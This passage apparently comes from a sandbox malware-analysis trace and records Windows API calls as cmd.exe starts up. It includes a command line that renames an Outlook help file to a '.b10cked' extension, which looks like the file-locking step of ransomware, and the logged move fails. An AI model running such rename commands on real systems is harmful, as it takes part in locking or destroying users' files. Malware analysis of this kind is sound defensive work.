lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.100] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.100] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.100] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.100] GetConsoleOutputCP () returned 0x1b5 [0202.100] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.100] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.100] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.100] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.101] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.101] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.101] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.101] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.101] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.101] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.101] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.101] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.101] GetEnvironmentStringsW () returned 0x2b0190* [0202.101] FreeEnvironmentStringsW (penv=0x2b0190) returned 1 [0202.102] GetEnvironmentStringsW () returned 0x2b0190* [0202.102] FreeEnvironmentStringsW (penv=0x2b0190) returned 1 [0202.102] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e86c | out: phkResult=0x18e86c*=0x40) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0xb8, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x0, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegCloseKey (hKey=0x40) returned 0x0 [0202.102] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e86c | out: phkResult=0x18e86c*=0x40) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x0, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegCloseKey (hKey=0x40) returned 0x0 [0202.102] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.102] srand (_Seed=0x5b8863a4) [0202.102] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked\"" [0202.102] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked\"" [0202.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.103] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.103] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.103] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.103] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.103] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.103] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.103] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.103] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.103] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.103] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.103] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.103] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.103] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.103] GetEnvironmentStringsW () returned 0x2b22e0* [0202.103] FreeEnvironmentStringsW (penv=0x2b22e0) returned 1 [0202.103] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.103] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.104] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.104] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.104] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.104] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.104] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.104] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.104] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.104] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.104] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f638 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.104] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f638, lpFilePart=0x18f634 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f634*="Desktop") returned 0x18 [0202.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.104] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x2b0020 [0202.104] FindClose (in: hFindFile=0x2b0020 | out: hFindFile=0x2b0020) returned 1 [0202.104] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x2b0020 [0202.104] FindClose (in: hFindFile=0x2b0020 | out: hFindFile=0x2b0020) returned 1 [0202.104] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f3b4 | out: lpFindFileData=0x18f3b4) returned 0x2b0020 [0202.104] FindClose (in: hFindFile=0x2b0020 | out: hFindFile=0x2b0020) returned 1 [0202.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.105] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.105] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.105] GetEnvironmentStringsW () returned 0x2b2b00* [0202.105] FreeEnvironmentStringsW (penv=0x2b2b00) returned 1 [0202.105] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.105] GetConsoleOutputCP () returned 0x1b5 [0202.105] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.105] GetUserDefaultLCID () returned 0x409 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f778, cchData=128 | out: lpLCData="0") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f778, cchData=128 | out: lpLCData="0") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f778, cchData=128 | out: lpLCData="1") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.106] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.106] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.107] GetConsoleTitleW (in: lpConsoleTitle=0x2a08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.107] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.107] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.107] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.108] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.108] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.108] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.108] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.108] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.108] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.108] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.111] GetConsoleTitleW (in: lpConsoleTitle=0x18f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.111] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.111] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.111] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.111] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.111] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.111] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.111] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.111] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.111] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.111] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.111] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.111] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.111] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.111] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.111] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.111] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.111] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.111] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.111] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.111] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.111] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.111] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.111] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.111] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.111] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.111] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.111] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.111] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.111] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.111] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.112] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.112] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.112] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.112] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.112] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.113] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f22c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f224, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f224*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.113] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.114] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.114] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.114] _wcsicmp (_String1="MSOUTL~2.HXN", _String2=".") returned 63 [0202.114] _wcsicmp (_String1="MSOUTL~2.HXN", _String2="..") returned 63 [0202.114] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msoutl~2.hxn")) returned 0x2022 [0202.115] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1e58 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.115] SetErrorMode (uMode=0x0) returned 0x0 [0202.115] SetErrorMode (uMode=0x1) returned 0x0 [0202.115] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", nBufferLength=0x104, lpBuffer=0x18ebb4, lpFilePart=0x18eb9c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", lpFilePart=0x18eb9c*="MSOUTL~2.HXN") returned 0x27 [0202.115] SetErrorMode (uMode=0x0) returned 0x1 [0202.115] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.115] _wcsicmp (_String1="MSOUTL~2.HXN", _String2=".") returned 63 [0202.115] _wcsicmp (_String1="MSOUTL~2.HXN", _String2="..") returned 63 [0202.115] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msoutl~2.hxn")) returned 0x2022 [0202.115] SetErrorMode (uMode=0x0) returned 0x0 [0202.115] SetErrorMode (uMode=0x1) returned 0x0 [0202.115] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", nBufferLength=0x104, lpBuffer=0x18f030, lpFilePart=0x18edc8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", lpFilePart=0x18edc8*="MSOUTL~2.HXN") returned 0x27 [0202.115] SetErrorMode (uMode=0x0) returned 0x1 [0202.115] SetErrorMode (uMode=0x0) returned 0x0 [0202.115] SetErrorMode (uMode=0x1) returned 0x0 [0202.115] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x18f238, lpFilePart=0x18edc8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked", lpFilePart=0x18edc8*="MS.OUTLOOK.DEV.14.1033.hxn.b10cked") returned 0x3d [0202.115] SetErrorMode (uMode=0x0) returned 0x1 [0202.115] SetLastError (dwErrCode=0x0) [0202.115] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.outlook.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0202.116] GetLastError () returned 0x2 [0202.116] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18e744, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e744) returned 0x2a0e90 [0202.116] FindNextFileW (in: hFindFile=0x2a0e90, lpFindFileData=0x18e744 | out: lpFindFileData=0x18e744) returned 0 [0202.116] FindClose (in: hFindFile=0x2a0e90 | out: hFindFile=0x2a0e90) returned 1 [0202.116] GetLastError () returned 0x12 [0202.116] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18e744, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e744) returned 0x2a0e90 [0202.116] FindNextFileW (in: hFindFile=0x2a0e90, lpFindFileData=0x18e744 | out: lpFindFileData=0x18e744) returned 0 [0202.117] FindClose (in: hFindFile=0x2a0e90 | out: hFindFile=0x2a0e90) returned 1 [0202.117] GetLastError () returned 0x12 [0202.117] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x2b1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1bf8) returned 0x2a0e90 [0202.117] FindNextFileW (in: hFindFile=0x2a0e90, lpFindFileData=0x2b1bf8 | out: lpFindFileData=0x2b1bf8) returned 0 [0202.117] FindClose (in: hFindFile=0x2a0e90 | out: hFindFile=0x2a0e90) returned 1 [0202.118] GetLastError () returned 0x12 [0202.118] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x2b1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1bf8) returned 0x2a0e90 [0202.118] FindNextFileW (in: hFindFile=0x2a0e90, lpFindFileData=0x2b1bf8 | out: lpFindFileData=0x2b1bf8) returned 0 [0202.118] FindClose (in: hFindFile=0x2a0e90 | out: hFindFile=0x2a0e90) returned 1 [0202.118] GetLastError () returned 0x12 [0202.118] _get_osfhandle (_FileHandle=2) returned 0xb [0202.118] GetFileType (hFile=0xb) returned 0x2 [0202.572] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.572] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18e914 | out: lpMode=0x18e914) returned 1 [0202.572] _get_osfhandle (_FileHandle=2) returned 0xb [0202.572] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18e948 | out: lpConsoleScreenBufferInfo=0x18e948) returned 1 [0202.573] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.574] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e988 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.574] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x18e96c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e96c*=0x2c) returned 1 [0202.574] longjmp () [0202.574] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.574] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 